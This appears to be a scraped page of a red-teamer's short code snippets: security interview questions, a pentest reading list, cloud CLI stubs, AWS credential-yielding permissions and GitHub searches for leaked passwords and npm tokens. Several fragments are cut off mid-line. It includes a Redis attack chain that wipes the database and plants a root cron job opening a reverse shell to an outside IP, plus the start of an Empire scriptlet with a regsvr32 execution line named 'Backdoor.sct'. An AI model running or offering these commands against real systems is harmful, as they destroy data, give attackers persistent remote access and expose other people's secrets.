carnal0wnage

1. What is information security and how is it achieved?
2. What are the core principles of information security?
3. What is non-repudiation (as it applies to IT security)?
4. What is the relationship between information security and data availability?
5. What is a security policy and why do we need one?
6. What is the difference between logical and physical security? Can you give an example of both?
7. What’s an acceptable level of risk?
8. What are the most common types of attacks that threaten enterprise data security?
9. What is the difference between a threat and a vulnerability?
10. Can you give me an example of common security vulnerabilities?

carnal0wnage

From: http://redteams.net/bookshelf/
Techie

    Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
    Social Engineering: The Art of Human Hacking by Christopher Hadnagy
    Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
    The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
    Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
    Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
    The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

carnal0wnage

# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list

project="my-project"
space=""

echo "gcloud auth list"
gcloud auth list
echo -e "$space"

carnal0wnage

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save



from https://phpinfo.me/2016/07/07/1275.html

carnal0wnage

//from: https://github.com/rathergood/Crypto-Currency-Price/blob/master/ccprice

//returns price (or other info) of cryptocurrency from coinmarketcap api.
//takes two parameters, the name of the cryptocurrency and info that you want returned about the cc

//example: =ccprice("ethereum", "USD")
//example2 =ccprice("ethereum", "24h_volume_usd")

function ccprice(name, currency) 
{

carnal0wnage

__author__ = 'srv'

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication

username = ''  # Email Address from the email you want to send an email
password = ''  # Password
server = smtplib.SMTP('')

carnal0wnage

• chime:createapikey
• codepipeline:pollforjobs
• cognito-identity:getopenidtoken
• cognito-identity:getopenidtokenfordeveloperidentity
• cognito-identity:getcredentialsforidentity
• connect:getfederationtoken
• connect:getfederationtokens
• ecr:getauthorizationtoken
• [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_Re

carnal0wnage

RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links  SessionID: HTA-W02

https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains

Recording of talk from CERN
https://indico.cern.ch/event/622483/  (click the recording button)

Past talks:
http://www.slideshare.net/KenJohnson61/aws-surival-guide

carnal0wnage

echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo "  password"
echo "https://github.com/search?q=%22$1%22+password&type=Code"
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code"
echo ""
echo " npmrc _auth"

carnal0wnage

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
	>
	<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->